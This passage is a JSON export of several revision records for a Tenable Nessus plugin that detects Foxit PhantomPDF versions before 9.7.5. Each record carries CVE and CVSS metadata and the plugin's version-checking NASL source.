number.\");\n # https://www.foxitsoftware.com/support/security-bulletins.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a27a3e57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit PhantomPDF version 9.7.5 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27860\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantom\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantompdf\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_phantom_installed.nasl\");\n script_require_keys(\"installed_sw/FoxitPhantomPDF\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'FoxitPhantomPDF';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '9.0', 'max_version' : '9.7.4.29600', 'fixed_version' : '9.7.5' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:foxitsoftware:phantompdf", "cpe:/a:foxitsoftware:phantom"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-06-03T23:58:24", "differentElements": ["cvss2", "cvss3"], "edition": 5}, {"bulletin": {"id": "FOXIT_PHANTOM_9_7_5.NASL", "hash": "ab96c99a9091b4d0cc60c7748b82b065", "type": "nessus", "bulletinFamily": "scanner", "title": "Foxit PhantomPDF < 9.7.5 Multiple Vulnerabilities", "description": "According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows\nhost is prior to 9.7.5. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this\nissue but has instead relied only on the application's self-reported version number.", "published": "2020-12-30T00:00:00", "modified": "2020-12-30T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://www.tenable.com/plugins/nessus/144647", "reporter": "This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?a27a3e57"], "cvelist": ["CVE-2020-28203", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-13570", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13557"], "immutableFields": [], "lastseen": "2021-07-29T00:04:27", "history": [], "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["FOXIT_READER_10_1_1.NASL", "FOXIT_PHANTOM_10_1_1.NASL"]}, {"type": "kaspersky", "idList": ["KLA12028"]}, {"type": "cve", "idList": ["CVE-2020-13547", "CVE-2020-13570", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-28203", "CVE-2020-13557", "CVE-2020-13548"]}, {"type": "zdi", "idList": ["ZDI-20-1415"]}, {"type": "talos", "idList": ["TALOS-2020-1166", "TALOS-2020-1181", "TALOS-2020-1171", "TALOS-2020-1175", "TALOS-2020-1165"]}], "modified": "2021-07-29T00:04:27", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-07-29T00:04:27", "rev": 2}}, "objectVersion": "1.6", "pluginID": "144647", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144647);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/03\");\n\n script_cve_id(\n \"CVE-2020-13547\",\n \"CVE-2020-13548\",\n \"CVE-2020-13557\",\n \"CVE-2020-13560\",\n \"CVE-2020-13570\",\n \"CVE-2020-27860\",\n \"CVE-2020-28203\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0099-S\");\n\n script_name(english:\"Foxit PhantomPDF < 9.7.5 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF toolkit installed on the remote Windows host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows\nhost is prior to 9.7.5. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this\nissue but has instead relied only on the application's self-reported version number.\");\n # https://www.foxitsoftware.com/support/security-bulletins.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a27a3e57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit PhantomPDF version 9.7.5 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27860\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantom\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantompdf\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_phantom_installed.nasl\");\n script_require_keys(\"installed_sw/FoxitPhantomPDF\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'FoxitPhantomPDF';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '9.0', 'max_version' : '9.7.4.29600', 'fixed_version' : '9.7.5' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:foxitsoftware:phantompdf", "cpe:/a:foxitsoftware:phantom"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-07-29T00:04:27", "differentElements": ["cpe", "cvss2", "cvss3", "cvssScoreSource", "description", "exploitEase", "modified", "patchPublicationDate", "references", "solution", "vpr", "vulnerabilityPublicationDate"], "edition": 6}, {"bulletin": {"id": "FOXIT_PHANTOM_9_7_5.NASL", "hash": "25639a96312209f78ad220dede8d633f", "type": "nessus", "bulletinFamily": "scanner", "title": "Foxit PhantomPDF < 9.7.5 Multiple Vulnerabilities", "description": "According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows host is prior to 9.7.5. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2020-12-30T00:00:00", "modified": "2021-06-03T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/144647", "reporter": "This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13547", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13570", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27860", "http://www.nessus.org/u?a27a3e57", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13557", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13560", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13548", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28203"], "cvelist": ["CVE-2020-13547", "CVE-2020-13548", "CVE-2020-13557", "CVE-2020-13560", "CVE-2020-13570", "CVE-2020-27860", "CVE-2020-28203"], "immutableFields": [], "lastseen": "2021-08-05T12:55:11", "history": [], "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["FOXIT_PHANTOM_10_1_1.NASL", "FOXIT_READER_10_1_1.NASL"]}, {"type": "kaspersky", "idList": ["KLA12028"]}, {"type": "cve", "idList": ["CVE-2020-28203", "CVE-2020-13547", "CVE-2020-27860", "CVE-2020-13570", "CVE-2020-13548", "CVE-2020-13557", "CVE-2020-13560"]}, {"type": "zdi", "idList": ["ZDI-20-1415"]}, {"type": "talos", "idList": ["TALOS-2020-1175", "TALOS-2020-1181", "TALOS-2020-1165", "TALOS-2020-1171", "TALOS-2020-1166"]}], "modified": "2021-08-05T12:55:11", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-08-05T12:55:11", "rev": 2}}, "objectVersion": "1.6", "pluginID": "144647", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144647);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/03\");\n\n script_cve_id(\n \"CVE-2020-13547\",\n \"CVE-2020-13548\",\n \"CVE-2020-13557\",\n \"CVE-2020-13560\",\n \"CVE-2020-13570\",\n \"CVE-2020-27860\",\n \"CVE-2020-28203\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0099-S\");\n\n script_name(english:\"Foxit PhantomPDF < 9.7.5 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF toolkit installed on the remote Windows host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows\nhost is prior to 9.7.5. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this\nissue but has instead relied only on the application's self-reported version number.\");\n # https://www.foxitsoftware.com/support/security-bulletins.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a27a3e57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit PhantomPDF version 9.7.5 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27860\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantom\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantompdf\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_phantom_installed.nasl\");\n script_require_keys(\"installed_sw/FoxitPhantomPDF\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'FoxitPhantomPDF';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '9.0', 'max_version' : '9.7.4.29600', 'fixed_version' : '9.7.5' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "naslFamily": "Windows", "cpe": [], "solution": "Upgrade to Foxit PhantomPDF version 9.7.5 or later", "nessusSeverity": "", "cvssScoreSource": "CVE-2020-27860", "vpr": {"risk factor": "Medium", "score": "6.7"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2020-12-30T00:00:00", "vulnerabilityPublicationDate": "2020-12-09T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-05T12:55:11", "differentElements": ["cpe"], "edition": 7}, {"bulletin": {"id": "FOXIT_PHANTOM_9_7_5.NASL", "hash": "4ab6cb7605ace2bdbbe9787e9dda7f7e", "type": "nessus", "bulletinFamily": "scanner", "title": "Foxit PhantomPDF < 9.7.5 Multiple Vulnerabilities", "description": "According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows host is prior to 9.7.5. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2020-12-30T00:00:00", "modified": "2021-06-03T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/144647", "reporter": "This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13570", "http://www.nessus.org/u?a27a3e57", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13557", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13548", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28203", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13547", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27860", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13560"], "cvelist": ["CVE-2020-13547", "CVE-2020-13548", "CVE-2020-13557", "CVE-2020-13560", "CVE-2020-13570", "CVE-2020-27860", "CVE-2020-28203"], "immutableFields": [], "lastseen": "2021-08-06T13:29:59", "history": [], "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "kaspersky", "idList": ["KLA12028"]}, {"type": "nessus", "idList": ["FOXIT_READER_10_1_1.NASL", "FOXIT_PHANTOM_10_1_1.NASL"]}, {"type": "cve", "idList": ["CVE-2020-13548", "CVE-2020-27860", "CVE-2020-13570", "CVE-2020-13560", "CVE-2020-13547", "CVE-2020-13557", "CVE-2020-28203"]}, {"type": "zdi", "idList": ["ZDI-20-1415"]}, {"type": "talos", "idList": ["TALOS-2020-1175", "TALOS-2020-1166", "TALOS-2020-1171", "TALOS-2020-1181", "TALOS-2020-1165"]}], "modified": "2021-08-06T13:29:59", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-08-06T13:29:59", "rev": 2}}, "objectVersion": "1.6", "pluginID": "144647", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144647);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/03\");\n\n script_cve_id(\n \"CVE-2020-13547\",\n \"CVE-2020-13548\",\n \"CVE-2020-13557\",\n \"CVE-2020-13560\",\n \"CVE-2020-13570\",\n \"CVE-2020-27860\",\n \"CVE-2020-28203\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0099-S\");\n\n script_name(english:\"Foxit PhantomPDF < 9.7.5 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF toolkit installed on the remote Windows host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows\nhost is prior to 9.7.5. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this\nissue but has instead relied only on the application's self-reported version number.\");\n # https://www.foxitsoftware.com/support/security-bulletins.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a27a3e57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit PhantomPDF version 9.7.5 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27860\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantom\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantompdf\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_phantom_installed.nasl\");\n script_require_keys(\"installed_sw/FoxitPhantomPDF\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'FoxitPhantomPDF';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '9.0', 'max_version' : '9.7.4.29600', 'fixed_version' : '9.7.5' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:foxitsoftware:phantom", "cpe:/a:foxitsoftware:phantompdf"], "solution": "Upgrade to Foxit PhantomPDF version 9.7.5 or later", "nessusSeverity": "", "cvssScoreSource": "CVE-2020-27860", "vpr": {"risk factor": "Medium", "score": "6.7"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2020-12-30T00:00:00", "vulnerabilityPublicationDate": "2020-12-09T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-06T13:29:59", "differentElements": ["nessusSeverity"], "edition": 8}, {"bulletin": {"id": "FOXIT_PHANTOM_9_7_5.NASL", "hash": "3b4808705bf4cabff1e6f0d6f6bc7355", "type": "nessus", "bulletinFamily": "scanner", "title": "Foxit PhantomPDF < 9.7.5 Multiple Vulnerabilities", "description": "According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows host is prior to 9.7.5. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2020-12-30T00:00:00", "modified": "2021-06-03T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/144647", "reporter": "This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27860", "http://www.nessus.org/u?a27a3e57", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13547", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13557", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13548", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13560", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28203", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13570"], "cvelist": ["CVE-2020-13547", "CVE-2020-13548", "CVE-2020-13557", "CVE-2020-13560", "CVE-2020-13570", "CVE-2020-27860", "CVE-2020-28203"], "immutableFields": [], "lastseen": "2021-08-19T12:09:06", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "kaspersky", "idList": ["KLA12028"]}, {"type": "nessus", "idList": ["FOXIT_PHANTOM_10_1_1.NASL", "FOXIT_READER_10_1_1.NASL"]}, {"type": "cve", "idList": ["CVE-2020-13548", "CVE-2020-13560", "CVE-2020-13547", "CVE-2020-28203", "CVE-2020-27860", "CVE-2020-13570", "CVE-2020-13557"]}, {"type": "zdi", "idList": ["ZDI-20-1415"]}, {"type": "talos", "idList": ["TALOS-2020-1166", "TALOS-2020-1175", "TALOS-2020-1181", "TALOS-2020-1165", "TALOS-2020-1171"]}], "modified": "2021-08-19T12:09:06", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-08-19T12:09:06", "rev": 2}}, "objectVersion": "1.6", "pluginID": "144647", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144647);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/03\");\n\n script_cve_id(\n \"CVE-2020-13547\",\n \"CVE-2020-13548\",\n \"CVE-2020-13557\",\n \"CVE-2020-13560\",\n \"CVE-2020-13570\",\n \"CVE-2020-27860\",\n \"CVE-2020-28203\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0099-S\");\n\n script_name(english:\"Foxit PhantomPDF < 9.7.5 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF toolkit installed on the remote Windows host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows\nhost is prior to 9.7.5. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this\nissue but has instead relied only on the application's self-reported version number.\");\n # https://www.foxitsoftware.com/support/security-bulletins.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a27a3e57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit PhantomPDF version 9.7.5 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27860\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantom\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantompdf\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_phantom_installed.nasl\");\n script_require_keys(\"installed_sw/FoxitPhantomPDF\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'FoxitPhantomPDF';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '9.0', 'max_version' : '9.7.4.29600', 'fixed_version' : '9.7.5' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:foxitsoftware:phantom", "cpe:/a:foxitsoftware:phantompdf"], "solution": "Upgrade to Foxit PhantomPDF version 9.7.5 or later", "nessusSeverity": "Medium", "cvssScoreSource": "CVE-2020-27860", "vpr": {"risk factor": "Medium", "score": "6.7"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2020-12-30T00:00:00", "vulnerabilityPublicationDate": "2020-12-09T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-19T12:09:06", "differentElements": ["vpr"], "edition": 9}, {"bulletin": {"id": "FOXIT_PHANTOM_9_7_5.NASL", "hash": "f8340e3935aec5e92d9b34d2e11d0d27", "type": "nessus", "bulletinFamily": "scanner", "title": "Foxit PhantomPDF < 9.7.5 Multiple Vulnerabilities", "description": "According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows host is prior to 9.7.5. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2020-12-30T00:00:00", "modified": "2021-06-03T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/144647", "reporter": "This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13560", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13570", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13548", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28203", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13547", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27860", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13557", "http://www.nessus.org/u?a27a3e57"], "cvelist": ["CVE-2020-13547", "CVE-2020-13548", "CVE-2020-13557", "CVE-2020-13560", "CVE-2020-13570", "CVE-2020-27860", "CVE-2020-28203"], "immutableFields": [], "lastseen": "2021-09-24T11:53:55", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "kaspersky", "idList": ["KLA12028"]}, {"type": "nessus", "idList": ["FOXIT_READER_10_1_1.NASL", "FOXIT_PHANTOM_10_1_1.NASL"]}, {"type": "cve", "idList": ["CVE-2020-28203", "CVE-2020-13557", "CVE-2020-13548", "CVE-2020-13560", "CVE-2020-13570", "CVE-2020-13547", "CVE-2020-27860"]}, {"type": "zdi", "idList": ["ZDI-20-1415"]}, {"type": "talos", "idList": ["TALOS-2020-1181", "TALOS-2020-1175", "TALOS-2020-1171", "TALOS-2020-1165", "TALOS-2020-1166"]}], "modified": "2021-09-24T11:53:55", "rev": 2}, 